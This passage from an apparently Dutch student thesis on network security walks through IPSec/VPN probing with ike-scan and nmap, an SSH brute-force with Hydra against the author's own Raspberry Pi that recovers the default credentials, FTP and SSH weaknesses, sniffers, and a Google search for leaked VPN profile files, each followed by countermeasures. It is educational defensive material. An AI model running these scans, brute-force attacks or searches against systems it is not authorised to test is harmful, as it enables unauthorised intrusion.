moeilijk te maken om in die tunnel binnen te breken. Er worden vele verschillende soorten encryptie

gebruikt.

4.4.1 Probing IPSec tunnel Om te kunnen binnenbreken in een tunnel, moet je eerst te weten komen welke zaken de IPSec

tunnel gebruikt om een tunnel op te stellen.

Je kan de aanwezigheid van een tunnel niet zomaar te weten komen met een poortscan, omdat een

VPN meestal de pakketten zal laten vallen die niet aan een bepaald formaat voldoen.

De volgende tool kan hiervoor gedownload worden: ike-scan van NTA Monitor (www.nta-

monitor.com/tools/ike-scan)

Commando:

root@bt:~# ike-scan 192.168.1.1

Resultaat:

Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-

scan/)

192.168.1.1 Notify message 14 (NO-PROPOSAL-CHOSEN) HDR=(CKY-

R=0e803d2b90649737)

Ending ike-scan 1.9: 1 hosts scanned in 0.014 seconds (72.26 hosts/sec). 0

returned handshake; 1 returned notify

4.4.2 IPSec/IKE Enumeratie Tegenmaatregels Om een ike-scan tegen te houden, kan je instellen dat er alleen maar naar deze poort mag

gevraagd worden vanaf specifieke IP-adressen. Dit kan je wel alleen maar doen met een Site-to-Site

VPN waar het IP-adres onveranderd blijft.

Het vorige is zeer moeilijk uit te voeren als je ook de mogelijkheid wil geven om een VPN op te stellen

van op een publiek netwerk waar het IP-adres dynamisch verkregen is, via DHCP. In dit geval is het

aangeraden om met een sterk wachtwoord of certificaten te werken.

Page 70: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

70

Page 71: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

71

Stap 4: Hacking Unix 1 Inleiding In de vorige stappen was het, het doel om het netwerk in kaart te brengen en informatie te krijgen

over de verschillende aanwezige systemen en protocollen en waar deze aanwezig zijn in het netwerk.

In deze stap zullen we proberen binnen te breken in die specifieke services. Het doel van deze stap

zullen doen is toegang te krijgen tot de systemen en waar het kan “root access” proberen te

verkrijgen op de systemen.

Deze stap heet “Hacking Unix”. Er bestaat ook een stap “Hacking Windows” maar omdat de meeste

servers bestaan uit Unix-servers hebben we geopteerd om enkel “Hacking Unix” te bespreken.

2 Brute-force Aanval Een Brute-force aanval is één van de oudste aanvalsvormen die er bestaat. Deze aanvalsvorm bestaat

uit het raden naar wachtwoorden en gebruikersnamen. Dit kan niet bij elke service. De meest

gebruikte services die dit soort van aanval toelaten, als je ze niet goed beveiligd, zijn:

Telnet

File Transfer Protocol (FTP)

De “r” commands (RLOGIN, RSH, enz.)

Secure Shell (SSH)

Simple Network Management Protocol (SNMP) community namen

Lightweight Directory Access Protocol (LDAPv2 en LDAPv3)

Post Office Protocol (POP)

Internet Message Access Protocol (IMAP)

Hypertext Transport Protocol (HTTP)

Hypertext Transport Protocol Secure (HTTPS)

Concurrent Version System (CVS)

Subversion (SVN)

Postgres

MySQL

Oracle

2.1 Brute-force aanval toepassen Om een brute-force aanval toe te passen kan je eerst een “Finger-“, “Rusers-” of “Sendmail-”aanval

plegen om gebruikersnamen te bemachtigen. Je kan dan deze gebruikersnamen gebruiken om je

aanval mee uit te voeren. Het is mogelijk om een brute-force aanval manueel uit te voeren, al wordt

dit meestal overgelaten aan tools die hiervoor gemaakt zijn.

De volgende brute-force aanval vindt plaats in een thuisomgeving en het toestel dat betrokken is bij

deze aanval is eigen eigendom.

Het toestel dat aangevallen wordt is een Raspberry Pi. Om deze aanval in te

leiden heb ik al de default gebruikersnamen en wachtwoorden opgezocht, ik

heb deze in de documenten gebruikersnaam.txt en wachtwoord.txt

geplaatst. De tool, Hydra is gebruikt omdat deze de meest populaire tool is

op het vlak van brute-force aanvallen. Figuur 2-1 Raspberry Pi

Page 72: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

72

Commando:

root@bt:~# hydra -L gebruikersnaam.txt -P wachtwoord.txt 192.168.1.6 ssh

Resultaat:

Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes

only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-01-04 17:57:34

[DATA] 16 tasks, 1 server, 25 login tries (l:5/p:5), ~1 try per task

[DATA] attacking service ssh on port 22

[STATUS] attack finished for 192.168.1.6 (waiting for children to finish)

[22][ssh] host: 192.168.1.6 login: pi password: raspberry

1 of 1 target successfuly completed, 1 valid password found

Hydra (http://www.thc.org/thc-hydra) finished at 2014-01-04 17:57:51

Uit het voorbeeld kunnen we de volgende zaken afleiden:

Er zijn 5 wachtwoorden en 5 gebruikersnamen opgegeven, wat zorgt voor 25 mogelijkheden.

De service SSH op poort 22 zal worden aangevallen.

De gebruikersnaam en het wachtwoord zijn geraden, gebruikersnaam: pi wachtwoord:

raspberry.

2.2 Brute-Force aanval Tegenmaatregels De beste verdediging tegen een brute-force aanval is ervoor zorgen dat je sterke

wachtwoorden bedenkt, of een programma die wachtwoorden laat genereren. Je mag zeker niet de

default ingestelde wachtwoorden en gebruikersnamen laten staan. Als je in een bedrijf beslist over

welke wachtwoorden de gebruikers mogen kiezen kan je enkele voorwaarden opleggen.

Enkele goede voorwaarden zijn:

minimum passwoord lengte

maximum aantal weken dat je hetzelfde wachtwoord kan behouden

niet toelaten om twee keer hetzelfde wachtwoord te gebruiken

minimum aantal karakters uit het alfabet

minimum aantal nummers

minimum aantal speciale karakters

minimum aantal kleine letters

minimum aantal hoofdletters

Naast aan je gebruikers goede wachtwoorden te laten kiezen kan je nog enkele andere zaken

implementeren in je systeem, zodat een brute-force aanval veel langer zal duren of zelf niet zal

lukken:

elke keer als er een verkeerde login plaatsvindt, de verbinding verbreken

elke keer als er een verkeerde login plaats vindt, pas na 20 seconden opnieuw laten proberen

services uitzetten die niet gebruikt worden

ervoor zorgen dat geen enkel wachtwoord twee keer voorkomt in het netwerk

default wachtwoorden veranderen

Page 73: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

73

3 File Transfer Protocol File transfer protocol (FTP) is een protocol dat gebruikt wordt om bestanden op en van een server te

halen. De server waar deze bestanden opstaan wordt een FTP server genoemd, de service wordt FTP

genoemd en is te vinden op poort 21.

Hackers zullen deze service misbruiken door illegale bestanden op te slaan bij mensen die een FTP

server hebben en die er niet van bewust zijn dat deze bestanden op hun FTP server aanwezig zijn.

Vele FTP servers laten anonieme toegang toe. Dit wil zeggen dat de gebruikers zonder authenticatie

op de FTP server mogen.

Meestal wordt er op een FTP server slechts een gedeelte van de hele FTP server opengezet,

bijvoorbeeld alleen een bepaalde map. Op een FTP server die anonieme toegang toelaat, worden

echter al de bestanden en mappen opengesteld waardoor de aanvallers gevoelige gegevens kunnen

downloaden. Zoals het bestand in /etc/passwd.

Sommige FTP servers hebben boven deze anonieme toegang dan ook nog eens “world writable

directories”. Dit betekent dat al de gebruikers die toegelaten zijn tot het systeem bestanden kunnen

schrijven op de FTP server.

Als een server de anonieme toegang en de “world writable directory” toelaat dan vraag je eigenlijk

naar moeilijkheden. Het is zo goed als zeker dat er iemand zal proberen illegale bestanden op je FTP

server te plaatsen. Dit zal gebeuren omdat het zo gemakkelijk is om toegang te krijgen tot de FTP-

server.

3.1 FTP-server aanvallen Zoals eerder al besproken is het bij UNIX het doel om root access te behalen op het systeem. Er

bestaat een exploit die een “shell” zal creëren op een lokale poort, die gekozen kan worden door de

aanvaller. Hierdoor krijgt de hacker root access op het systeem.

Dit is een exploit gevonden door King Cope op de FreeBSD FTPD en ProFTPD systemen. Als je

geïnteresseerd bent over de werking van deze aanval, kan je het boek Hacking Exposed 7 raadplegen

op pagina 260.

3.2 FTP aanval Tegenmaatregels FTP is een zeer nuttig protocol dat nog zeer veel gebruikt wordt. Als je FTP gebruikt is het

belangrijk dat je nagaat of anonieme toegang nodig is op je systeem. Als dit niet nodig is, gebruik je

dit beter ook niet. Het is altijd beter als je de gasten een account laat aanmaken. Op deze manier kan

ja de handelingen van die accounts nagaan.

Ook is het belangrijk om de hoeveelheid “world writable directories” te beperken tot het minimum.

Ten laatste is het aan te raden om de laatste patches toe te passen om zo de exploits aan het

systeem in te korten.

bron: http://wiki.dreamhost.com/Troubleshooting_Hacked_Sites#Looking_world-

writable_directories

Page 74: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

74

4 Secure Shell

4.1 SSH Secure shell (SSH) is een protocol dat zeer veel gebruikt wordt voor remote access. Het is een

protocol dat ontstaan is voor de veiligheid. SSH zal al zijn gegevens die over het netwerk gaan,

encrypteren en SSH zal ook zorgen voor goede authenticatie van de gebruikers.

Er is bij dit protocol ook een mogelijkheid om root-access te behalen. Dit kan je doen op servers van

volgende types:

OpenSSH service van ouder dan 2.3.0

SSH-1.2.24 tot SSH-1.2.31 versie

4.2 SSH Tegenmaatregels Het is belangrijk dat je de SSH service die op je cliënt en server staat blijft updaten tot de

laatste nieuwe versie. Voor meer informatie over SSH best practices:

http://www.cyberciti.biz/tips/linux-unix-bsd-openssh-server-best-practices.html

5 Sniffers

5.1 Wat is een sniffer? Sniffers zijn veelgebruikte programma’s door aanvallers en netwerk administrators. Ze geven de

mogelijkheid om het netwerkverkeer af te luisteren en al de pakketten te laten zien die over het

netwerk verstuurd worden, van en naar de computer waar de sniffer opstaat.

5.2 Aanvaller Wat een aanvaller zal doen is root access proberen te krijgen in een systeem. Op een systeem dat op

het netwerk staat zal hij een sniffer plaatsen. Hierdoor zal hij de mogelijkheid hebben om al het

netwerkverkeer af te luisteren en wachtwoorden, gebruikersnamen en documenten buit te maken.

5.3 Administrator Een netwerkadministrator zal een sniffer gebruiken om meer te weten te komen over zijn eigen

netwerk. Als hij iets geïmplementeerd heeft en het werkt niet meteen, zal hij een sniffer gebruiken

om te achterhalen wat er gebeurt met de pakketten die verstuurd worden op het netwerk.

5.4 Hoe werkt een sniffer? Een ethernet sniffer werkt samen met de Network Interface Card (NIC). Een NIC zal normaal alleen

maar al het verkeer dat voor hem bestemd is ontvangen. Een sniffer zal hier verandering in brengen.

Eerste zal een sniffer de NIC in staat stellen om al het verkeer af te luisteren dat voorbijkomt, ook al

het verkeer dat niet voor hem bestemd is. Dit wil zeggen dat de sniffer de NIC in “promicious mode”

zal plaatsen. Op dit moment kan je de sniffer aanzetten en zal deze al het verkeer analyseren en op je

scherm laten zien.

Een sniffer wordt meestal gebruikt op een plaats in het netwerk waar veel verkeer is, of waar kritieke

zaken gedaan worden op het netwerk. Bijvoorbeeld op de computer van de administrator, of op de

router die in verbinding staat met het internet.

5.5 Voorbeeld van een sniffer Een sniffer die veel gebruikt wordt op Windows en op UNIX computers is Wireshark.

Wireshark kan gedownload worden van http://www.wireshark.org/download.html.

Page 75: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

75

De volgende afbeelding illustreert de start van de sniffer Wireshark. Op dit scherm moet je de

interface kiezen waarop je wil afluisteren en dan op start klikken.

Figuur 5-1 Wireshark startscherm

Op de volgende figuur kan je zien dat Wireshark bezig is het netwerk te sniffen. Hij zal het netwerk

dus afluisteren en de pakketten analyseren. Op de volgende figuur is er ook een filter geplaatst dit

enkel de ICMP berichten laat zien.

Figuur 5-2 Wireshark Filter ICMP

Page 76: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

76

5.6 Populaire sniffers In de volgende tabel zullen de populairste sniffers uitgelegd worden met elk hun downloadpagina en

beschrijving.

Naam Download locatie Beschrijving

Tcpdump http://sourceforge.net/projects/tcpdump Klassieke pakket sniffer die beschikbaar is op vele besturingssystemen.

Snoop Zit ingebouwd in het besturingssysteem Solaris. Solaris is te downloaden via https://solaris.java.net.

Een pakket sniffer die ingebouwd zit in het besturingssysteem Solaris.

Dsniff http://monkey.org/~dugsong/dsniff Één van de sniffers die het meeste mogelijkheden heeft.

Ettercap http://ettercap.github.io/ettercap Een sniffer met de mogelijkheid om arp-poisoning te doen.

Wireshark http://www.wireshark.org/download.html Een freeware sniffer met veel protocol decoders.

Tabel 5-6 Populaire sniffers

5.7 Sniffers Tegenmaatregel Er zijn drie verschillende manieren om sniffers tegen te houden:

migreren naar een switched netwerk topologie

sniffers detecteren

encryptie toepassen, SSH of IPSec

5.7.1 Migreren naar een switched netwerk topologie In een niet switched netwerk topologie wordt er gebruik gemaakt van een hub waardoor al het

verkeer zal gebroadcast worden naar al de hosts. Op deze manier zal het mogelijk zijn om al het

verkeer af te luisteren op één enkele plek op het netwerk. Het is dus noodzakelijk om de broadcasts

te beperken. Dit kan je doen door de hubs te veranderen in switches en waar het nodig en mogelijk

is, een VLAN aan te maken. Dit komt de performantie van het netwerk ten goede.

5.7.2 Sniffers detecteren Je kan sniffers detecteren op verschillende manieren.

Bij host-based detectie kan je verschillende zaken ondernemen om na te gaan of er een sniffer

aanwezig is op de computer:

nakijken of de NIC in promicious mode staat

nakijken of er een sniffer bij de processen zit

nakijken of er een sniffer bij het taakbeheer zit

zoeken naar grote logbestanden, want een sniffer maakt vaak grote logbestanden

5.7.3 Encryptie (SSH, IPSec) Een sniffer zal netwerkverkeer afluisteren, maar als dat netwerkverkeer geëncrypteerd is kan de

persoon die dit netwerkverkeer heeft laten afluisteren er niet veel mee aanvangen. Daarom is het

noodzakelijk om gevoelige gegevens te encrypteren. En je moet zeker ook nagaan of je gegevens

geëncrypteerd blijven tot ze hun bestemming bereikt hebben. Het zou zonde zijn dat je gegevens

Page 77: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

77

gedecrypteerd ergens op het netwerk te vinden zijn, als jij ze toch geëncrypteerd heeft. Dit kan

gebeuren als je een proxy gebruikt die geen HTTPS ondersteunt.

Een protocol dat je kan gebruiken om vanop afstand in te loggen op een systeem, en dat hierbij

encryptie gebruikt, is Secure Shell (SSH).

IPSec en IKE zijn Internet standaarden die kunnen zorgen voor de authenticatie en voor het

encrypteren van netwerkverkeer.

6 Honeypot server Een Honeypot server is geen server om ergens binnen te breken, maar je kan deze server

gebruiken om je te verdedigen tegen aanvallen. Zo een soort server zal openstaan voor aanvallen, er

zal een besturingssysteem draaien, waarvan geweten is dat er kan bij binnengebroken worden. In

ditzelfde toestel bevinden zich wachtwoorden en gebruikersnamen. De hacker denkt dan dat zijn

hack succesvol is en zal geen argwaan hebben.

De verdediger heeft deze server per opzet geplaatst. Terwijl de hacker bezig is met aanvallen, heeft

deze Honeypot server veel gegevens over de hacker en over zijn werkwijze bijgehouden. Op deze

manier kunnen de hackers tegengehouden en gevat worden.

Bron: http://en.wikipedia.org/wiki/Honeypot_%28computing%29

Page 78: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

78

Page 79: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

79

Stap 5: Virtual Private Network 1 Inleiding Er zijn zeer veel bedrijven die toelaten dat hun medewerkers van op afstand werken op en naast de

systemen die in de onderneming staan. Eén van de voorwaarden hiervan is dat de gegevens veilig bij

de onderneming geraken. Om hiervoor te zorgen, gebruiken veel ondernemingen een Virtual Private

Network.

2 Virtual Private Network (VPN) Een Virtual Private Network (VPN) is een privaat netwerk. Dit wordt gebruikt als er een medewerker

van thuis wilt werken op de toestellen die op het netwerk in het bedrijf staan. Je kan dit ook doen

zonder VPN, maar dan zijn je gegevens niet beveiligd. Een VPN maakt een tunnel van bij een

gebruiker naar een bedrijf. Deze tunnel zal gebruikt worden om gegevens veilig van bij een

medewerker tot bij een bedrijf te brengen.

Als een bedrijf twee vestigingen heeft, kan je ook een VPN opstellen tussen beide instellingen zodat

ze virtueel in hetzelfde netwerk zitten.

Er zijn vier grote voordelen om voor een VPN te kiezen:

Confidentialiteit: dit wil zeggen dat de pakketten geëncrypteerd zijn. Enkel de

mensen/toestellen die je vertrouwt, zullen je pakket goed kunnen lezen omdat zij een “key”

hebben om het pakket de decrypteren. Als iemand je verbinding zou afluisteren, zouden ze

niets kunnen doen met de gegevens omdat ze geëncrypteerd zijn.

Data integriteit: als je een bestand doorstuurt zou het kunnen dat iemand onderweg je

pakket aangepast heeft waardoor de data veranderd zijn. Als je met gevoelige gegevens

werkt, is het noodzakelijk dit tegen te gaan.

o Wanneer de VPN opgesteld wordt zal de hash doorgestuurd worden zodat zowel de

ontvanger als de verstuurder de hash hebben. Een hash is een algoritme dat de VPN

zal uitvoeren op de pakketten. Dit zal gebeuren, zowel bij de verstuurder als bij de

ontvanger. De verstuurder zal bij het versturen van een pakket de hash uitvoeren, hij

zal hierbij een code verkrijgen. De ontvanger zal diezelfde hash uitvoeren op de

pakketten die hij ontvangen heeft. Als de code die de ontvanger heeft bekomen

dezelfde code is als de code die in het pakket aanwezig is, dan weet de ontvanger dat

de integriteit van de data behouden is.

o De manieren die je kan gebruiken om te een hash toe te passen zijn:

Message Digest 5 (MD5)

Secure Hash Algorithm 1 (SHA-1)

Secure Hash Algoritm 2 (SHA-2)

Authenticatie: bij een VPN is het de bedoeling dat niet iedereen een VPN kan opstellen naar

je bedrijf, maar enkel de mensen die hiervoor bevoegd zijn. De verschillende methodes die

gebruikt kunnen worden in een VPN zijn:

o pre-shared keys

o public en pricate key pairs

o gebruiker authenticatie

Antireplay: als een aanvaller je VPN verkeer afluistert en veinst dat hij de persoon is

waarmee al een VPN lopende is, zal dit niet lukken. Een hacker zal dit proberen te doen door

Page 80: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

80

het pakket dat hij afgeluisterd heeft, terug te sturen naar het toestel waarvan de VPN

lopende is. Dit zal hij niet kunnen doen, omdat elk pakket dat gebruikt is geweest in de VPN

sessie niet meer toegelaten is in het netwerk.

In het kort:

Doel Methode

Confidentialiteit Encryptie

Data integriteit Hashing

Authenticatie Pre-shared keys, public/private key pair

Antireplay Geïntegreerd in IPSec, serienummers toevoegen aan de pakketten en geen pakket met hetzelfde serienummer toelaten.

Bron: CCNA Security 640-554 Official Cert Guide

2.1 De tot stand komst van een IPSec VPN Een IPSec VPN is een type VPN dat laag 3 van het OSI-model gebruikt, de netwerk-laag. Een IPSec

VPN zal twee fases gebruiken om tot een beveiligde verbinding te komen. Deze fases zijn:

Internet Key Exchange Fase 1 (IKE Fase 1)

o Main mode

o Agressive mode

Internet Key Exchange Fase 2 (IKE Fase 2)

2.1.1 Internet Key Exchange Fase 1 (IKE Fase 1) De IKE Fase 1 tunnel is een tunnel die zal gebruikt worden om het management voor de VPN te

beveiligen. Er moet over 5 zaken genegotieerd worden tussen de initiator en de responder:

Het Hash Algoritme: Message Digest 5 Algoritme (MD5) of Secure Hash Algoritme (SHA)

Het Encryptie Algoritme: Digital Encryption Standard (DES), Triple DES (3DES) of Advanced

Encryption Standard (AES)

De Diffie-Hellman group: dit is het uitwisselen van een geheime encryptiesleutel om daarna

communicatie tussen de initiator en de responder te versleutelen.

De Authenticatiemethode: dit wordt gebruikt om de identiteit van de initiator en de

responder te controleren. Dit kan gebeuren met Pre Shared keys of een Public-Private key

pair (RSA)

Lifetime: hier wordt besproken hoe lang de VPN open blijft staan, als er geen verkeer over

komt. Het veiligste is om dit korter te maken dan één dag. Als dit niet overeenkomt tussen de

initiator of de responder is dit niet erg. De tunnel zal toch werken met de kortst ingestelde

tijd.

Als je van elk van deze zaken beslist hebt welke je zal gebruiken, heb je de keuze tussen twee modes

om deze tunnel op te zetten. Je kan kiezen voor “Main mode” ofwel “Agressive mode”.

Page 81: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

81

2.1.1.1 Main mode

Deze mode wordt het meeste gebruikt om een VPN op te stellen omdat deze het veiligste is. Deze

main mode bestaat uit drie verschillende stappen.

eerst beslissen de initiator en responder welke algoritmen en hashes gebruikt worden om de

communicatie in de IKE tunnel te beveiligen.

ten tweede zal er een Diffie-Hellman public key uitgewisseld worden voor het genereren van

gedeelde geheime keys. Er zullen ook nonces uitgewisseld worden, om de identiteit van de

deelnemers te bevestigen.

ten derde zal de identiteit van beide gecontroleerd worden door naar het geëncrypteerd IP-

adres te kijken.

2.1.1.2 Agressive Mode

Deze methode is minder veilig, omdat er minder controle is bij het opstarten van deze tunnel. Deze

methode is wel sneller, want er worden minder pakketten verstuurd. Een nadeel aan de agressive

mode is dat er gegevens uitgewisseld zijn voor de tunnel opgestart is. Die gegevens zijn dus niet

geëncrypteerd en kunnen afgeluisterd worden. Deze agressive mode bestaat uit 2 stappen:

eerst beslissen de initiator en responder welke algoritmen, hashes, Diffie-Hellman public key

en welke nonces gebruikt worden om de communicatie in de IKE tunnel te beveiligen

ten tweede zal de initiator de identiteit van de responder controleren. Als dit in orde is,

wordt de tunnel opgezet

2.1.2 Internet Key Exchange Fase 2 (IKE Fase 2) In de IKE fase 2 zal er een tunnel opgezet worden om de eigenlijke data van de gebruikers te

encrypteren. Dit zal gebeuren met de hulp van de IKE fase 1. IKE fase 2 heeft één mode, deze mode is

de “Quick mode”

2.1.2.1 Quick mode

De “Quick mode” is de mode die zal gebruikt worden om de eigenlijke VPN tunnel op te starten

waardoor de gegevens van de gebruiker zullen lopen. Deze mode bestaat uit 3 stappen:

eerst beslissen de initiator en responder welke algoritmen en hashes gebruikt worden om de

communicatie in de IKE tunnel te beveiligen. Dit zal gebeuren in de al gemaakte tunnel door

de IKE fase 1 waardoor alles geëncrypteerd is

ten tweede zullen de overeengekomen algoritmen en hashes in werking treden in de volledig

beveiligde tunnel, omdat ze al beveiligd zijn door de IKE fase 1

Als alles overeengekomen is, dan zal een IPSec Security Association ontstaan. Dit is een verzameling

van encryptiemethodes en keys die gebruikt zullen worden om je gegevens over te brengen. De

afbeelding hieronder geeft een duidelijke blik op de IPSec tunnel.

Page 82: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

82

Tabel 2-1 IPSec tunnel

Bronnen:

https://sc1.checkpoint.com/documents/R77/CP_R77_VPN_AdminGuide/13847.htm

https://supportforums.cisco.com/docs/DOC-8125,

http://en.wikipedia.org/wiki/IPsec#Security_association,

http://en.wikipedia.org/wiki/Internet_Security_Association_and_Key_Management_Protocol,

http://cisco-vpn.org.ua/1587051044/ch08lev1sec1.html,

http://nl.wikipedia.org/wiki/Diffie-Hellman-sleuteluitwisselingsprotocol

2.2 Site-to-site VPN Een site-to-site VPN is een VPN dat je kan gebruiken om een tunnel te maken tussen twee

vestigingen van een bedrijf. Het netwerk zal er dan virtueel uitzien als één netwerk, waardoor de

twee vestigingen naadloos met elkaar kunnen communiceren.

2.3 Client-to-site VPN Bij een client-to-site VPN zal je een VPN opstellen van één enkele gebruiker naar een

bedrijfsnetwerk. Dit is een goede keuze als je medewerker wil werken via een openbaar onbeveiligd

draadloos netwerk, bijvoorbeeld op luchthavens en andere. In dit geval kan hij gebruikmaken van

software zoals een Cisco VPN client die de IPSec tunnel zal opstellen voor de gebruiker. Hij kan in dit

geval ook gebruik maken van een SSL VPN.

2.4 Google hacking voor VPN Zoals al bewezen in “Stap 1 – Footprinting” is het gebruik van Google gemakkelijk, om snel toestellen

te vinden waar gevoelige informatie opstaan. Om profiel gegevens te vinden die gebruikt worden bij

een VPN kan je naar bestanden zoeken met het bestandstype pcf. Als je bijvoorbeeld wilt zoeken

naar de VPN die gebruikt wordt door elec0ne, kan je de volgende zoekopdracht intypen:

filetype:pcf site:elec0ne.com. Als je hiermee een bestand vindt, staan daar geëncrypteerde

gegevens in. Als je dit pcf bestand gedownload hebt, kan je dit importeren in een Cisco VPN Client

waarna je connectie kan maken met de VPN. Hierdoor zit je dus op het netwerk en kan je andere

aanvallen uitvoeren op het netwerk.

Page 83: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

83

2.4.1 Google hacking voor VPN Tegenmaatregel Normaalgezien zouden de pcf bestanden niet zomaar mogen te vinden zijn op het internet.

Bij sommige bedrijven is dit wel het geval, het gaat dan om mensen die een VPN willen opstarten

maar eigenlijk niet goed weten waarmee ze bezig zijn.

2.5 Probing IPSec VPN Servers Om na te gaan of er een VPN server aanwezig is op het netwerk, kan je zoeken naar UDP poort 500 in

het netwerk. Je kan dit doen met de tool Nmap. Het kan zijn dat je hierdoor geen resultaat bekomt.

Dit komt omdat, als je een VPN opstelt, je ervoor kan kiezen dat deze onzichtbaar is als er een scan

uitgevoerd wordt op poort 500.

Commando:

nmap -sU -p 500 192.168.1.1

Resultaat :

Starting Nmap 6.25 ( http://nmap.org ) at 2014-01-16 11:08 CET

Nmap scan report for 192.168.1.1

Host is up (0.00062s latency).

PORT STATE SERVICE

500/udp open isakmp

MAC Address: 44:03:A7:AA:02:E0 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 13.17 seconds

Er kan voor gezorgd worden dat Nmap niet het gewenste resultaat bekomt en daarom kan je nog een

gedetailleerdere scan uitvoeren.

Om een gedetailleerde scan uit te voeren kan je de volgende tool downloaden: ike-scan van NTA-

Monitor (www.nta-monitor.com/tools/ike-scan).

Met deze tool zal je ook veel meer te weten komen over de VPN dan alleen maar of er een VPN

aanwezig is.

Commando:

ike-scan 192.168.1.1

Resultaat:

Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-

scan/)

192.168.1.1 Notify message 14 (NO-PROPOSAL-CHOSEN) HDR=(CKY-

R=0e803d2b90649737)

Ending ike-scan 1.9: 1 hosts scanned in 0.014 seconds (72.26 hosts/sec). 0

returned handshake; 1 returned notify

2.5.1 Probing IPSec VPN Servers Tegenmaatregel Je kan weinig doen om tegen te gaan dat er ontdekt wordt dat er een VPN aanwezig. Je kan

bij een site-to-site VPN wel enkel aan de IP-adressen die je vertrouwt de mogelijkheid geven om te

connecteren met de VPN. Maar als er gewerkt wordt met een site-to-site VPN is het niet mogelijk om

dit te vermijden, omdat men meestal vanaf een andere plaats, dus met een ander IP-adres, naar de

VPN server zal gaan.

Page 84: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

84

2.6 Attacking IKE Aggressive Mode Bij de IKE aggressive mode is er een manier om binnen te breken in een tunnel. En dit omdat de

gegevens bij de IKE fase 1 afgeluisterd kunnen worden. Eerst en vooral moet je te weten komen of de

VPN die je wilt aanvallen een aggressive mode aanvaart.

De tool die hiervoor gemaakt is: IKEProbe van Cipherica Labs

(www.ernw.de/download/ikeprobe.zip)

Als je weet dat de VPN die je wilt aanvallen een aggressive mode ondersteunt, kan je een perl script

laten werken die dan zal proberen binnen te breken in de VPN.

2.6.1 Attacking IKE Aggressive Mode Tegenmaatregel Het beste wat je kan doen om dit soort aanvallen tegen te houden is het gebruik van een

aggressive mode niet toe te laten op je VPN.

Page 85: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

85

Stap 6: Wireless Hacking 1 Inleiding In een bedrijfsomgeving wordt een draadloos netwerk meer om meer gebruikt, omdat het

gemakkelijk is als er gasten zijn die hun eigen toestellen meenemen. Dit geldt niet alleen voor gasten,

in vele bedrijven wordt er gedaan aan BYOD, dit is de term voor “Bring Your Own Device”. Als hun

eigen toestel dan een tablet is, dan is er geen andere keuze dan te kiezen voor een draadloze

oplossing voor het netwerk.

Een draadloos netwerk is altijd het punt in het netwerk dat het moeilijkste te beveiligen is. Als je

draadloos netwerk tot buiten de fysieke grenzen van je onderneming gaat, heb je zelfs al niet meer

de sociale controle of moet de aanvaller zelfs geen toegang krijgen tot je gebouw, maar kan hij van

buiten je gebouw proberen toegang te krijgen tot je draadloos netwerk.

Er bestaan verschillende manieren om je draadloos netwerk te beschermen, maar bij vele van deze

manieren is het mogelijk om de beveiligingscodes te kraken en zo een weg naar binnen te vinden.

2 Achtergrond Draadloze communicatie bestaat al lang. In de eerste wereldoorlog is deze veel gebruikt geweest.

Om veiligheidsredenen beperkten ze het gebruik van draadloze communicatie, en mocht het alleen

gebruikt worden voor militaire doeleinden.

Het is pas in het jaar 1997 dat het draadloze Local Area Network (LAN) ontstaan is. Deze standaard is

uitgebracht door “The Institute of Electrical and Electronics Engineers” (IEEE). De standaard kreeg de

naam 802.11 of Wi-Fi. Elke keer als er een nieuwe versie van deze standaard uitgebracht wordt,

wordt dit nummer aangepast.

Bron: http://compnetworking.about.com/cs/wireless80211/a/aa80211standard.htmFrequenties

3 Channels en frequenties De 802.11 standaard werkt met verschillende frequenties en channels. De frequenties die gebruikt

worden voor een Wi-Fi netwerk zijn 2.4 GHz en 5.8 GHz. Het hangt af van de versie van de standaard

